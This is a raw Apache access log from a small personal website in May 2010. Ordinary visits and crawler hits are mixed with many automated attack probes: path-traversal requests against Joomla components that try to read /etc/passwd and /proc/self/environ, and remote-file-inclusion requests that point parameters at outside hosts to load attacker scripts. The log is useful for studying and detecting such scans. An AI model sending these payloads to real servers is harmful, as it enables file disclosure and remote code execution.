67.195.112.180 - - [22/May/2010:23:29:41 -0500] "GET /?D=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.93.174.129 - - [22/May/2010:23:29:45 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:08 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:23 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:23 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:24 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:24 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:24 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:24 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:24 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:31 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
87.250.255.243 - - [22/May/2010:23:30:32 -0500] "GET /logs/access_log.1214352000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.93.174.129 - - [22/May/2010:23:30:32 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:34 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:34 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:30:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)"
89.163.148.130 - - [22/May/2010:23:30:50 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.163.148.130 - - [22/May/2010:23:30:50 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.195.224 - - [22/May/2010:23:32:32 -0500] "GET /logs/access_log.1250121600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.196.124.203 - - [22/May/2010:23:34:39 -0500] "GET /logs/access_log.1271548800//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.elracodelangela.com//templates/beez/upload/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
91.196.124.203 - - [22/May/2010:23:34:39 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.elracodelangela.com//templates/beez/upload/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.196.124.203 - - [22/May/2010:23:34:39 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.elracodelangela.com//templates/beez/upload/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.234.200.72 - - [22/May/2010:23:37:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&task=tag&category=36&Itemid=78/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
200.234.200.72 - - [22/May/2010:23:37:08 -0500] "GET /index.php?option=com_myblog&task=tag&category=36&Itemid=78/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.234.200.72 - - [22/May/2010:23:37:09 -0500] "GET /logs/index.php?option=com_myblog&task=tag&category=36&Itemid=78/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.55.224.242 - - [22/May/2010:23:38:24 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:38:35 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:38:35 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
98.158.180.39 - - [22/May/2010:23:39:01 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 298 "-""Mozilla/4.61 (Macintosh; I; PPC)"
98.158.180.39 - - [22/May/2010:23:39:01 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 293 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
67.195.112.180 - - [22/May/2010:23:39:40 -0500] "GET /logs/access_log.1210377600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.224.242 - - [22/May/2010:23:41:50 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:41:51 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:41:51 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:41:54 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:41:55 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:41:55 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:42:46 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.224.242 - - [22/May/2010:23:42:46 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
81.169.175.150 - - [22/May/2010:23:42:58 -0500] "GET /magazine.php?inc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""-"
81.169.175.150 - - [22/May/2010:23:42:59 -0500] "GET /magazine.php?inc=./../../../../../../../../etc/passwd HTTP/1.1" 404 296 "-""-"
66.249.65.51 - - [22/May/2010:23:43:17 -0500] "GET /logs/access_log.1272844800 HTTP/1.1" 200 451290 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.51 - - [22/May/2010:23:43:41 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
87.250.255.243 - - [22/May/2010:23:45:43 -0500] "GET /logs/access_log.1228780800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
89.163.148.130 - - [22/May/2010:23:46:17 -0500] "GET /logs/index.php?url=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.163.148.130 - - [22/May/2010:23:46:18 -0500] "GET /index.php?url=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.98.216.61 - - [22/May/2010:23:47:30 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:32 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:33 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:34 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:35 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:36 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:37 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:38 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:40 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:41 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:42 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:43 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:44 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:44 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:45 -0500] "GET //index.php?option=com_hsconfig&controller=../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:46 -0500] "GET //index.php?option=com_hsconfig&controller=../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:47 -0500] "GET //index.php?option=com_hsconfig&controller=../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:49 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:50 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:51 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:52 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:53 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:54 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:55 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:56 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:47:57 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.165.197.21 - - [22/May/2010:23:50:52 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Python-urllib/2.6"
88.131.106.30 - - [22/May/2010:23:51:58 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.30 - - [22/May/2010:23:52:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
216.129.119.43 - - [22/May/2010:23:54:06 -0500] "GET /?M=D HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
99.198.118.114 - - [22/May/2010:23:55:00 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
99.198.118.114 - - [22/May/2010:23:55:00 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:55:05 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:55:06 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
173.236.37.218 - - [22/May/2010:23:55:10 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:23:55:10 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:23:55:11 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:23:55:11 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
99.198.108.74 - - [22/May/2010:23:55:12 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.831"
99.198.108.74 - - [22/May/2010:23:55:12 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
207.45.185.178 - - [22/May/2010:23:55:15 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
207.45.185.178 - - [22/May/2010:23:55:15 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
67.210.123.70 - - [22/May/2010:23:55:29 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.819"
67.210.123.70 - - [22/May/2010:23:55:29 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.819"
67.195.112.180 - - [22/May/2010:23:57:18 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [22/May/2010:23:59:03 -0500] "GET /logs/access_log.1236729600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.239.161.143 - - [22/May/2010:23:59:35 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
211.239.161.143 - - [22/May/2010:23:59:35 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
173.236.37.218 - - [23/May/2010:00:02:39 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
173.236.37.218 - - [23/May/2010:00:02:39 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
99.198.118.114 - - [23/May/2010:00:02:39 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
207.45.185.178 - - [23/May/2010:00:02:39 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
99.198.118.114 - - [23/May/2010:00:02:39 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
207.45.185.178 - - [23/May/2010:00:02:39 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.67.225.61 - - [23/May/2010:00:02:45 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
216.67.225.61 - - [23/May/2010:00:02:45 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
174.121.59.218 - - [23/May/2010:00:03:01 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:00:03:01 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
97.74.75.246 - - [23/May/2010:00:03:51 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:00:03:52 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.133.201.194 - - [23/May/2010:00:04:03 -0500] "GET /logs/index2.php?url_page=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:00:04:03 -0500] "GET /index2.php?url_page=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:00:04:04 -0500] "GET /logs/access_log.1271548800/index2.php?url_page=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.67.225.61 - - [23/May/2010:00:04:25 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
216.67.225.61 - - [23/May/2010:00:04:25 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
216.67.225.61 - - [23/May/2010:00:04:26 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
174.133.201.194 - - [23/May/2010:00:04:30 -0500] "GET /logs/access_log.1271721600/index2.php?url_page=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
